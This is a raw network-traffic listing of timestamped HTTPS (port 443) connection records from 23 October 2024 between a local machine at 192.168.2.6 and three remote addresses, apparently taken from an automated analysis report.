                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.486871958 CEST49775443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.671595097 CEST4434977413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.674074888 CEST4434977713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.674926996 CEST4434977613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.675204039 CEST4434977813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.711512089 CEST49774443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.723109007 CEST49777443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.723124981 CEST49776443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.723186016 CEST49778443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.770622969 CEST49778443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.770684958 CEST4434977813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.770915985 CEST49778443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.770932913 CEST4434977813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.771146059 CEST49776443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.771158934 CEST4434977613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.771549940 CEST49776443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.771565914 CEST4434977613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.771811962 CEST49775443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.771842003 CEST4434977513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.772429943 CEST49775443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.772434950 CEST4434977513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.776679993 CEST49774443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.776690006 CEST4434977413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.777105093 CEST49774443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.777110100 CEST4434977413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.777285099 CEST49777443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.777307034 CEST4434977713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.777621984 CEST49777443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.777626991 CEST4434977713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.956588030 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.956790924 CEST49782443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.956799030 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.957051992 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.957285881 CEST49780443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.957293034 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.957824945 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.957828045 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.957850933 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.957926989 CEST49782443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.958209991 CEST49787443192.168.2.6169.150.247.38
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.958237886 CEST44349787169.150.247.38192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.958296061 CEST49787443192.168.2.6169.150.247.38
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.958445072 CEST49779443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.958467960 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.958744049 CEST49780443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.958823919 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.959000111 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.959032059 CEST49782443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.959095955 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.959201097 CEST49787443192.168.2.6169.150.247.38
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.959212065 CEST44349787169.150.247.38192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.959450006 CEST49779443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.959563971 CEST49780443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.959568977 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.959604979 CEST49782443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.959614038 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.959646940 CEST49779443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.960119963 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.960294008 CEST49781443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.960309982 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.962371111 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.962538004 CEST49783443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.962551117 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.963788986 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.963855982 CEST49783443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.963885069 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.963948011 CEST49781443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.964231014 CEST49783443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.964380980 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.964557886 CEST49781443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.964627028 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.964701891 CEST49783443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.964711905 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.964827061 CEST49781443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.964834929 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.975639105 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.975929976 CEST49785443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.975946903 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.979461908 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.979561090 CEST49785443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.979815006 CEST49785443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.979959965 CEST49785443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.979964972 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.979986906 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.002794027 CEST49782443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.007328033 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.007354975 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.018810034 CEST49781443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.019229889 CEST49783443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.034941912 CEST49785443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.034954071 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.082856894 CEST4434977813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.083030939 CEST4434977513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.083034992 CEST49785443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.083036900 CEST4434977813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.083117008 CEST49778443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.083209038 CEST4434977513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.083307028 CEST49778443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.083333969 CEST49775443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.083353043 CEST4434977813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.083409071 CEST49778443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.083411932 CEST49775443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.083411932 CEST49775443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.083426952 CEST4434977813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.083432913 CEST4434977513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.083444118 CEST4434977513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.085189104 CEST4434977713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.085349083 CEST4434977713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.085412979 CEST49777443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.085556030 CEST4434977413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.085733891 CEST4434977413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.085908890 CEST4434977613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.085983992 CEST49774443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.086112976 CEST4434977613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.086179972 CEST49776443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.086350918 CEST49788443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.086385012 CEST4434978813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.086425066 CEST49789443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.086445093 CEST49788443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.086520910 CEST4434978913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.086565018 CEST49774443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.086585045 CEST4434977413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.086594105 CEST49777443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.086594105 CEST49777443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.086596012 CEST49774443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.086596966 CEST49789443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.086601973 CEST4434977413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.086608887 CEST4434977713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.086617947 CEST4434977713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.087255955 CEST49789443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.087291956 CEST4434978913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.087444067 CEST49776443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.087445021 CEST49776443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.087471008 CEST4434977613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.087495089 CEST4434977613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.087882996 CEST49788443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.087894917 CEST4434978813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.088915110 CEST49790443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.088927984 CEST4434979013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.088988066 CEST49790443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.089226007 CEST49790443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.089240074 CEST4434979013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.089767933 CEST49791443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.089797974 CEST4434979113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.089895964 CEST49791443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.090043068 CEST49791443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.090070963 CEST4434979113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.090265036 CEST49792443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.090311050 CEST4434979213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.090378046 CEST49792443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.090496063 CEST49792443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.090506077 CEST4434979213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108267069 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108339071 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108386040 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108427048 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108438969 CEST49780443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108452082 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108486891 CEST49780443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108490944 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108529091 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108567953 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108583927 CEST49780443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108588934 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108618021 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108671904 CEST49780443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108678102 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108711004 CEST49779443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108719110 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108751059 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108859062 CEST49779443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108867884 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.108990908 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.109065056 CEST49779443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.109071970 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.109158993 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.109246969 CEST49779443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.109252930 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.110238075 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.110281944 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.110310078 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.110343933 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.110356092 CEST49782443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.110363007 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.110385895 CEST49782443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.110403061 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.110457897 CEST49782443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.110462904 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.111083031 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.111130953 CEST49782443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.111136913 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.113437891 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.113498926 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.113540888 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.113558054 CEST49783443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.113579035 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.113636017 CEST49783443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.113641977 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.113656998 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.113703966 CEST49783443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.113718033 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.113915920 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.114022970 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.114046097 CEST49783443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.114061117 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.114147902 CEST49783443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.119175911 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.119210958 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.119218111 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.119240999 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.119251966 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.119265079 CEST49782443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.119270086 CEST49781443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.119273901 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.119283915 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.119313955 CEST49781443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.119344950 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.119401932 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.119426012 CEST49781443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.119432926 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.119442940 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.119482040 CEST49781443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.123409033 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.123471975 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.123513937 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.123557091 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.123603106 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.123625040 CEST49785443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.123625040 CEST49785443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.123636961 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.123869896 CEST49785443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.123878956 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.123915911 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.123950958 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.123981953 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.123994112 CEST49785443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.124002934 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.124407053 CEST49785443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.130289078 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.130379915 CEST49781443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.130390882 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.132260084 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.163223982 CEST49779443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.163227081 CEST49780443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.163232088 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.163240910 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.163263083 CEST49782443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.179336071 CEST49785443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.179406881 CEST49783443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.179406881 CEST49781443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.203293085 CEST49779443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.203308105 CEST49780443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.224929094 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.225114107 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.225163937 CEST49779443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.225172043 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.226161957 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.226213932 CEST49779443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.226222038 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.226356983 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.226412058 CEST49779443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.228919029 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.229049921 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.229093075 CEST49782443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.229106903 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.229252100 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.229310989 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.229311943 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.229351997 CEST49782443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.229353905 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.229357004 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.229370117 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.229381084 CEST49780443192.168.2.6141.193.213.10
